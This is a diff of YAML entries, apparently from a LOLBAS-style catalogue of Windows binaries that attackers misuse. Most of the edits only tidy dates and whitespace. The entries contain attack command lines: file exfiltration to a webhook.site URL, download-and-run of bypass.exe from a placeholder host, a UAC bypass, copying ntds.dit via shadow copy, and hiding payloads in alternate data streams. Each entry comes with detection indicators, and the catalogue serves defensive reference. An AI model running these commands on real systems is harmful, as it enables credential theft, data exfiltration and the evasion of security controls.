- IOC: Execution of cmstp.exe should not be normal unless VPN is in use
|
||||
@ -40,4 +40,4 @@ Acknowledgement:
|
||||
Handle: '@oddvarmoe'
|
||||
- Person: Nick Tyrer
|
||||
Handle: '@NickTyrer'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: ConfigSecurityPolicy.exe
|
||||
Description: Binary part of Windows Defender. Used to manage settings in Windows Defender. you can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads.
|
||||
Author: 'Ialle Teixeira'
|
||||
Created: '04/09/2020'
|
||||
Created: 2020-09-04
|
||||
Commands:
|
||||
- Command: ConfigSecurityPolicy.exe C:\\Windows\\System32\\calc.exe https://webhook.site/xxxxxxxxx?encodedfile
|
||||
Description: Upload file, credentials or data exfiltration in general
|
||||
@ -14,9 +14,9 @@ Commands:
|
||||
OperatingSystem: Windows 10
|
||||
Full_Path:
|
||||
- Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: ConfigSecurityPolicy storing data into alternate data streams.
|
||||
- IOC: Preventing/Detecting ConfigSecurityPolicy with non-RFC1918 addresses by Network IPS/IDS.
|
||||
- IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching ConfigSecurityPolicy.exe.
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Control.exe
|
||||
Description: Binary used to launch controlpanel items in Windows
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: control.exe c:\windows\tasks\file.txt:evil.dll
|
||||
Description: Execute evil.dll which is stored in an Alternate Data Stream (ADS).
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\control.exe
|
||||
- Path: C:\Windows\SysWOW64\control.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Control.exe executing files from alternate data streams.
|
||||
@ -28,4 +28,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Jimmy
|
||||
Handle: '@bohops'
|
||||
---
|
||||
---
|
||||
|
@ -1,8 +1,8 @@
|
||||
---
|
||||
Name: Csc.exe
|
||||
Description: Binary file used by .NET to compile C# code
|
||||
Description: Binary file used by .NET to compile C# code
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: csc.exe -out:My.exe File.cs
|
||||
Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to My.exe.
|
||||
@ -23,13 +23,13 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Csc.exe should normally not run a system unless it is used for development.
|
||||
- IOC: Csc.exe should normally not run a system unless it is used for development.
|
||||
Resources:
|
||||
- Link: https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe
|
||||
Acknowledgement:
|
||||
- Person:
|
||||
- Person:
|
||||
Handle:
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Cscript.exe
|
||||
Description: Binary used to execute scripts in Windows
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: cscript c:\ads\file.txt:script.vbs
|
||||
Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS).
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\cscript.exe
|
||||
- Path: C:\Windows\SysWOW64\cscript.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Cscript.exe executing files from alternate data streams
|
||||
@ -25,4 +25,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Desktopimgdownldr.exe
|
||||
Description: Windows binary used to configure lockscreen/desktop image
|
||||
Author: Gal Kristal
|
||||
Created: 28/06/2020
|
||||
Created: 2020-06-28
|
||||
Commands:
|
||||
- Command: set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr
|
||||
Description: Downloads the file and sets it as the computer's lockscreen
|
||||
@ -14,9 +14,9 @@ Commands:
|
||||
OperatingSystem: Windows 10
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\desktopimgdownldr.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: desktopimgdownldr.exe that creates non-image file
|
||||
- IOC: Change of HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP\LockScreenImageUrl
|
||||
Resources:
|
||||
|
@ -2,9 +2,9 @@
|
||||
Name: Dfsvc.exe
|
||||
Description: ClickOnce engine in Windows used by .NET
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
|
||||
- Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
|
||||
Description: Executes click-once-application from Url
|
||||
Usecase: Use binary to bypass Application whitelisting
|
||||
Category: AWL bypass
|
||||
@ -17,14 +17,14 @@ Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
- IOC:
|
||||
Resources:
|
||||
- Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
|
||||
- Link: https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
---
|
||||
---
|
||||
|
@ -2,11 +2,11 @@
|
||||
Name: Diantz.exe
|
||||
Description: Binary that package existing files into a cabinet (.cab) file
|
||||
Author: 'Tamir Yehuda'
|
||||
Created: '08/08/2020'
|
||||
Created: 2020-08-08
|
||||
Commands:
|
||||
- Command: diantz.exe c:\pathToFile\file.exe c:\destinationFolder\targetFile.txt:targetFile.cab
|
||||
Description: Compress taget file into a cab file stored in the Alternate Data Stream (ADS) of the target file.
|
||||
Usecase: Hide data compressed into an Alternate Data Stream.
|
||||
Usecase: Hide data compressed into an Alternate Data Stream.
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
@ -14,7 +14,7 @@ Commands:
|
||||
OperatingSystem: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1.
|
||||
- Command: diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab
|
||||
Description: Download and compress a remote file and store it in a cab file on local machine.
|
||||
Usecase: Download and compress into a cab file.
|
||||
Usecase: Download and compress into a cab file.
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
@ -23,9 +23,9 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\diantz.exe
|
||||
- Path: c:\windows\syswow64\diantz.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: diantz storing data into alternate data streams.
|
||||
- IOC: diantz getting a file from a remote machine or the internet.
|
||||
Resources:
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Diskshadow.exe
|
||||
Description: Diskshadow.exe is a tool that exposes the functionality offered by the volume shadow copy Service (VSS).
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: diskshadow.exe /s c:\test\diskshadow.txt
|
||||
Description: Execute commands using diskshadow.exe from a prepared diskshadow script.
|
||||
@ -23,7 +23,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\diskshadow.exe
|
||||
- Path: C:\Windows\SysWOW64\diskshadow.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Child process from diskshadow.exe
|
||||
@ -33,4 +33,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Jimmy
|
||||
Handle: '@bohops'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Dnscmd.exe
|
||||
Description: A command-line interface for managing DNS servers
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll
|
||||
Description: Adds a specially crafted DLL as a plug-in of the DNS Service. This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the reference links for DLL details.
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\Dnscmd.exe
|
||||
- Path: C:\Windows\SysWOW64\Dnscmd.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Dnscmd.exe loading dll from UNC path
|
||||
@ -32,4 +32,4 @@ Acknowledgement:
|
||||
Handle: '@dim0x69'
|
||||
- Person: Nikhil SamratAshok
|
||||
Handle: '@nikhil_mitt'
|
||||
---
|
||||
---
|
||||
|
@ -2,12 +2,12 @@
|
||||
Name: Esentutl.exe
|
||||
Description: Binary for working with Microsoft Joint Engine Technology (JET) database
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o
|
||||
Description: Copies the source VBS file to the destination VBS file.
|
||||
Usecase: Copies files from A to B
|
||||
Category: Copy
|
||||
Category: Copy
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||
@ -29,7 +29,7 @@ Commands:
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o
|
||||
Description: Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file.
|
||||
Description: Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file.
|
||||
Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
@ -47,7 +47,7 @@ Commands:
|
||||
- Command: esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit
|
||||
Description: Copies a (locked) file using Volume Shadow Copy
|
||||
Usecase: Copy/extract a locked file such as the AD Database
|
||||
Category: Copy
|
||||
Category: Copy
|
||||
Privileges: Admin
|
||||
MitreID: T1003
|
||||
MitreLink: https://attack.mitre.org/techniques/T1003/
|
||||
@ -55,10 +55,10 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\esentutl.exe
|
||||
- Path: C:\Windows\SysWOW64\esentutl.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
- IOC:
|
||||
Resources:
|
||||
- Link: https://twitter.com/egre55/status/985994639202283520
|
||||
- Link: https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/
|
||||
|
@ -2,11 +2,11 @@
|
||||
Name: Eventvwr.exe
|
||||
Description: Displays Windows Event Logs in a GUI window.
|
||||
Author: 'Jacob Gajek'
|
||||
Created: '2018-11-01'
|
||||
Created: 2018-11-01
|
||||
Commands:
|
||||
- Command: eventvwr.exe
|
||||
Description: During startup, eventvwr.exe checks the registry value HKCU\Software\Classes\mscfile\shell\open\command for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user.
|
||||
Usecase: Execute a binary or script as a high-integrity process without a UAC prompt.
|
||||
Usecase: Execute a binary or script as a high-integrity process without a UAC prompt.
|
||||
Category: UAC bypass
|
||||
Privileges: User
|
||||
MitreID: T1088
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\eventvwr.exe
|
||||
- Path: C:\Windows\SysWOW64\eventvwr.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code: https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1
|
||||
Detection:
|
||||
- IOC: eventvwr.exe launching child process other than mmc.exe
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Expand.exe
|
||||
Description: Binary that expands one or more compressed files
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: expand \\webdav\folder\file.bat c:\ADS\file.bat
|
||||
Description: Copies source file to destination.
|
||||
@ -31,10 +31,10 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\Expand.exe
|
||||
- Path: C:\Windows\SysWOW64\Expand.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
- IOC:
|
||||
Resources:
|
||||
- Link: https://twitter.com/infosecn1nja/status/986628482858807297
|
||||
- Link: https://twitter.com/Oddvarmoe/status/986709068759949319
|
||||
@ -43,4 +43,4 @@ Acknowledgement:
|
||||
Handle: '@infosecn1nja'
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Explorer.exe
|
||||
Description: Binary used for managing files and system components within Windows
|
||||
Author: 'Jai Minton'
|
||||
Created: '2020-06-24'
|
||||
Created: 2020-06-24
|
||||
Commands:
|
||||
- Command: explorer.exe /root,"C:\Windows\System32\calc.exe"
|
||||
Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe
|
||||
@ -23,7 +23,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\explorer.exe
|
||||
- Path: C:\Windows\SysWOW64\explorer.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Multiple instances of explorer.exe or explorer.exe using the /root command line can help to detect this.
|
||||
|
@ -1,8 +1,8 @@
|
||||
---
|
||||
Name: Extexport.exe
|
||||
Description:
|
||||
Description:
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Extexport.exe c:\test foo bar
|
||||
Description: Load a DLL located in the c:\test folder with one of the following names mozcrt19.dll, mozsqlite3.dll, or sqlite.dll
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Program Files\Internet Explorer\Extexport.exe
|
||||
- Path: C:\Program Files (x86)\Internet Explorer\Extexport.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Extexport.exe loads dll and is execute from other folder the original path
|
||||
@ -24,4 +24,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Adam
|
||||
Handle: '@hexacorn'
|
||||
---
|
||||
---
|
||||
|
@ -1,12 +1,12 @@
|
||||
---
|
||||
Name: Extrac32.exe
|
||||
Description:
|
||||
Description:
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
|
||||
Description: Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.
|
||||
Usecase: Extract data from cab file and hide it in an alternate data stream.
|
||||
Usecase: Extract data from cab file and hide it in an alternate data stream.
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
@ -14,7 +14,7 @@ Commands:
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe
|
||||
Description: Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file.
|
||||
Usecase: Extract data from cab file and hide it in an alternate data stream.
|
||||
Usecase: Extract data from cab file and hide it in an alternate data stream.
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
@ -39,10 +39,10 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\extrac32.exe
|
||||
- Path: C:\Windows\SysWOW64\extrac32.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
- IOC:
|
||||
Resources:
|
||||
- Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
|
||||
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||
|
@ -1,8 +1,8 @@
|
||||
---
|
||||
Name: Findstr.exe
|
||||
Description:
|
||||
Description:
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe
|
||||
Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
|
||||
@ -39,7 +39,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\findstr.exe
|
||||
- Path: C:\Windows\SysWOW64\findstr.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: findstr.exe should normally not be invoked on a client system
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Forfiles.exe
|
||||
Description: Selects and executes a command on a file or set of files. This command is useful for batch processing.
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
|
||||
Description: Executes calc.exe since there is a match for notepad.exe in the c:\windows\System32 folder.
|
||||
@ -23,10 +23,10 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\forfiles.exe
|
||||
- Path: C:\Windows\SysWOW64\forfiles.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
- IOC:
|
||||
Resources:
|
||||
- Link: https://twitter.com/vector_sec/status/896049052642533376
|
||||
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||
@ -36,4 +36,4 @@ Acknowledgement:
|
||||
Handle: '@vector_sec'
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Ftp.exe
|
||||
Description: A binary designed for connecting to FTP servers
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-12-10'
|
||||
Created: 2018-12-10
|
||||
Commands:
|
||||
- Command: echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt
|
||||
Description: Executes the commands you put inside the text file.
|
||||
@ -23,7 +23,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\ftp.exe
|
||||
- Path: C:\Windows\SysWOW64\ftp.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: cmd /c as child process of ftp.exe
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: GfxDownloadWrapper.exe
|
||||
Description: Remote file download used by the Intel Graphics Control Panel, receives as first parameter a URL and a destination file path.
|
||||
Author: Jesus Galvez
|
||||
Created: Jesus Galvez
|
||||
Created: 2019-12-27
|
||||
Commands:
|
||||
- Command: C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE"
|
||||
Description: GfxDownloadWrapper.exe downloads the content that returns URL and writes it to the file DESTINATION FILE PATH. The binary is signed by "Microsoft Windows Hardware", "Compatibility Publisher", "Microsoft Windows Third Party Component CA 2012", "Microsoft Time-Stamp PCA 2010", "Microsoft Time-Stamp Service".
|
||||
@ -169,7 +169,7 @@ Full_Path:
|
||||
- Path: c:\windows\system32\driverstore\filerepository\ki132574.inf_amd64_54c9b905b975ee55\
|
||||
- Path: c:\windows\system32\driverstore\filerepository\ki132869.inf_amd64_052eb72d070df60f\
|
||||
- Path: c:\windows\system32\driverstore\filerepository\kit126731.inf_amd64_1905c9d5f38631d9\
|
||||
Detection:
|
||||
Detection:
|
||||
- IOC: Usually GfxDownloadWrapper downloads a JSON file from https://gameplayapi.intel.com.
|
||||
Resources:
|
||||
- Link: https://www.sothis.tech/author/jgalvez/
|
||||
|
@ -1,8 +1,8 @@
|
||||
---
|
||||
Name: Gpscript.exe
|
||||
Description: Used by group policy to process scripts
|
||||
Description: Used by group policy to process scripts
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Gpscript /logon
|
||||
Description: Executes logon scripts configured in Group Policy.
|
||||
@ -23,7 +23,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\gpscript.exe
|
||||
- Path: C:\Windows\SysWOW64\gpscript.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Scripts added in local group policy
|
||||
@ -33,4 +33,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Hh.exe
|
||||
Description: Binary used for processing chm files in Windows
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: HH.exe http://some.url/script.ps1
|
||||
Description: Open the target PowerShell script with HTML Help.
|
||||
@ -23,7 +23,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\hh.exe
|
||||
- Path: C:\Windows\SysWOW64\hh.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: hh.exe should normally not be in use on a normal workstation
|
||||
@ -32,4 +32,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
---
|
||||
|
@ -1,8 +1,8 @@
|
||||
---
|
||||
Name: Ie4uinit.exe
|
||||
Description:
|
||||
Description:
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: ie4uinit.exe -BaseSettings
|
||||
Description: Executes commands from a specially prepared ie4uinit.inf file.
|
||||
@ -17,7 +17,7 @@ Full_Path:
|
||||
- Path: c:\windows\sysWOW64\ie4uinit.exe
|
||||
- Path: c:\windows\system32\ieuinit.inf
|
||||
- Path: c:\windows\sysWOW64\ieuinit.inf
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: ie4uinit.exe loading a inf file from outside %windir%
|
||||
@ -26,4 +26,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Jimmy
|
||||
Handle: '@bohops'
|
||||
---
|
||||
---
|
||||
|
@ -2,9 +2,9 @@
|
||||
Name: Ieexec.exe
|
||||
Description: The IEExec.exe application is an undocumented Microsoft .NET Framework application that is included with the .NET Framework. You can use the IEExec.exe application as a host to run other managed applications that you start by using a URL.
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
|
||||
- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
|
||||
Description: Downloads and executes bypass.exe from the remote server.
|
||||
Usecase: Download and run attacker code from remote location
|
||||
Category: Download
|
||||
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1105
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
|
||||
- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
|
||||
Description: Downloads and executes bypass.exe from the remote server.
|
||||
Usecase: Download and run attacker code from remote location
|
||||
Category: Execute
|
||||
@ -23,13 +23,13 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
- IOC:
|
||||
Resources:
|
||||
- Link: https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Ilasm.exe
|
||||
Description: used for compile c# code into dll or exe.
|
||||
Author: Hai vaknin (lux)
|
||||
Created: 17/03/2020
|
||||
Created: 2020-03-17
|
||||
Commands:
|
||||
- Command: ilasm.exe C:\public\test.txt /exe
|
||||
Description: Binary file used by .NET to compile c# code to .exe
|
||||
@ -11,7 +11,7 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
MitreLink: https://attack.mitre.org/techniques/T1127/
|
||||
OperatingSystem: Windows 10,7
|
||||
OperatingSystem: Windows 10,7
|
||||
- Command: ilasm.exe C:\public\test.txt /dll
|
||||
Description: Binary file used by .NET to compile c# code to dll
|
||||
Usecase: A description of the usecase
|
||||
@ -22,7 +22,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Resources:
|
||||
- Link: https://github.com/LuxNoBulIshit/BeforeCompileBy-ilasm/blob/master/hello_world.txt
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Infdefaultinstall.exe
|
||||
Description: Binary used to perform installation based on content inside inf files
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: InfDefaultInstall.exe Infdefaultinstall.inf
|
||||
Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\Infdefaultinstall.exe
|
||||
- Path: C:\Windows\SysWOW64\Infdefaultinstall.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
|
||||
Detection:
|
||||
- IOC:
|
||||
@ -25,4 +25,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Kyle Hanslovan
|
||||
Handle: '@kylehanslovan'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Installutil.exe
|
||||
Description: The Installer tool is a command-line utility that allows you to install and uninstall server resources by executing the installer components in specified assemblies
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
|
||||
Description: Execute the target .NET DLL or EXE.
|
||||
@ -25,7 +25,7 @@ Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
